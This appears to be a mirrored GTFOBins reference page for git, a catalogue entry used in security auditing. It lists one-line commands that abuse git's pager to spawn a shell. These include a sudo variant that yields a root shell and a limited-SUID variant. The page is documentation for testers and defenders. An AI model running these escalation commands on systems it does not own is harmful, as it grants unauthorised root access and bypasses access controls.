This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-02 13:41:39 +01:00
Code
Issues
bd1d10bd03
GTFOBins.github.io
/
_gtfobins
/
git.md
Léo Meira Vital
bd1d10bd03
Updating git sudo to not drop capabilities
...
Close
#66
2019-07-09 20:55:47 +02:00
593 B
Raw
Blame
History
functions
shell
sudo
limited-suid
code
PAGER='sh -c "exec sh 0<&1"' git -p help
description
code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
git help config !/bin/sh
code
PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
description
code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
sudo git -p help config !/bin/sh
code
PAGER='sh -c "exec sh 0<&1"' ./git -p help